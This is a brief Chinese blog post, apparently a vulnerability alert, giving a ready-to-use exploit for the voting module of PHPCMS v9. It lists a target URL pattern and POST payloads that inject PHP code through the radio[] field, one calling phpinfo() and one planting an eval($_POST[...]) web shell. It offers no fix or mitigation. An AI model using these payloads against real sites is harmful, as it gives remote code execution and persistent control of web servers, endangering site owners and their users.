Menu

PHPCMS_v9之投票漏洞

2015-06-25 - Phpcms, web安全, 漏洞预警

废话不多说,直接上EXP

EXP

http://www.XXXXX.com.cn/index.php?m=vote&c=index&a=post&subjectid=1
post:
subjectid=1&radio[]=);phpinfo();%80
或者
subjectid=1&radio[]=);@eval($_POST[xiao]);%80

注意subjectid=对应的数字
目标
http://www.XXXXX.com.cn/index.php?m=vote&c=index&a=show&subjectid=1&siteid=1

 

201202131508416165[1]